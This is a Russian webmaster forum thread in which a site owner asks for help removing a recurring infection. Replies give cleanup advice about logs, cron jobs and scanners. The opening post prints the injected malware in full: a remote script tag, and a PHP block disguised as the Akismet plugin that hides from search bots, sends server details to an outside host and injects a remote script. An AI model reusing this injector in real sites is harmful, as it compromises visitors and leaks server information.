- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Доброго всем дня. Уже менсяц борюсь с этой заразой!! Может кто сталкивался прошу помочь :( незнаю что делать уже.
это вставка пстоянно всталяеться в котент вирус часть первая
--------------------------------------------------------------------
<!--b7bb54--><script type="text/javascript" src="http://labautomation.ru/jbkw2ybt.php?id=4477416"></script><!--/b7bb54-->
---------------------------------------------------------------------
эта вставка которая вставляеться в idex.php тему сайта! Я что только не делал, выствлял прова доступа на фаилы 444 всеровно меняет и всталяет эту дрянь! Менял пароли везде. Не помогает. Может укого что то было подобное как это победить???? :facepalm:
эта вставка которая вставляеться в idex.php тему сайта, часть вторая!
---------------------------------------------------------------------
<?php
#395547#
/**
* @package Akismet
*/
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
if( empty( $rr ) ) {
if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
$_SERVER['HTTP_USER_AGENT']
)
) {
} else {
error_reporting( 0 );
@ini_set( 'display_errors', 0 );
if( !function_exists( '__url_get_contents' ) ) {
function __url_get_contents( $remote_url, $timeout )
{
if( function_exists( 'curl_exec' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $remote_url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
$_url_get_contents_data = curl_exec( $ch );
curl_close( $ch );
} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
$ctx = @stream_context_create(
array(
'http' =>
array(
'timeout' => $timeout,
)
)
);
$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
$handle = @fopen( $remote_url, "r" );
$_url_get_contents_data = @stream_get_contents( $handle );
} else {
$_url_get_contents_data = __file_get_url_contents( $remote_url );
}
return $_url_get_contents_data;
}
}
if( !function_exists( '__file_get_url_contents' ) ) {
function __file_get_url_contents( $remote_url )
{
if( preg_match(
'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url,
$matches
)
) {
$protocol = strtolower( $matches[1] );
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return false;
}
if( $protocol == "http" ) {
$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
} else {
// Bad protocol
return false;
}
if( !$socket ) {
// Error creating socket
return false;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite( $socket, $request );
if( $len_written === false || $len_written != strlen( $request ) ) {
// Error sending request
return false;
}
$response = "";
while( !@feof( $socket ) &&
( $buf = @fread( $socket, 4096 ) ) !== false ) {
$response .= $buf;
}
if( $buf === false ) {
// Error reading response
return false;
}
$end_of_header = strpos( $response, "\r\n\r\n" );
return substr( $response, $end_of_header + 4 );
}
}
$rr['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$rr['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$rr['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
$rr['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
$rr['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
$rr['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
$rr['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
$rr = __url_get_contents("http://labautomation.ru/jbkw2ybt.php" . "?fid=318923&info=" . http_build_query( $rr ) . "&no=1", 1);
echo "<script type=\"text/javascript\" src=\"http://labautomation.ru/jbkw2ybt.php?id=4477447\"></script>";
}
}
#/395547#
?>
----------------------------------------------------------------------------
До боли знакомо) Смотрим логи, фильтруем POST запросы
До боли знакомо) Смотрим логи, фильтруем POST запросы
не совсем понял где смотреть как папки называются как вы победили? это не весь вирус?
не совсем понял где смотреть как папки называются как вы победили? это не весь вирус?
на сервере у себя где сайт валяется. Вирус
Доброго всем дня
И заодно учимся пользоваться тегом CODE
Так ладно. В таком случае пару вопросов, хостинг Timeweb?, в CRONe есть ли какие либо задачи? Есть ли на хостинге еще сайты? Файл с логами должен быть где то в корню.
Вам что жалко пару рублей на проверку от вирусов у спецов? закажите и не парьте се мозг.
ТС, все дистанционные действия не помогут, нужно смотреть код всего двжика.
Блин неужели некто не может помочь одна вода
Блин неужели некто не может помочь одна вода
Вызвать сантехника
Попытаться устранить все самостоятельно.
Для самостоятельного устранения должны быть базовые понятия как действуют вирусы, что такое cron, post и прочее. Провести диагностику, устранить причину и закрыть дыру.
Если вы не хотите в этом разбираться - не надо, обратитесь к специалистам.
Упрекать кого-то, что вас не хотят этому всему обучить и помочь - глупо. (
Diks-5, Айболитом прогоните. Если не сможете, обращайтесь ко мне, посмотрю.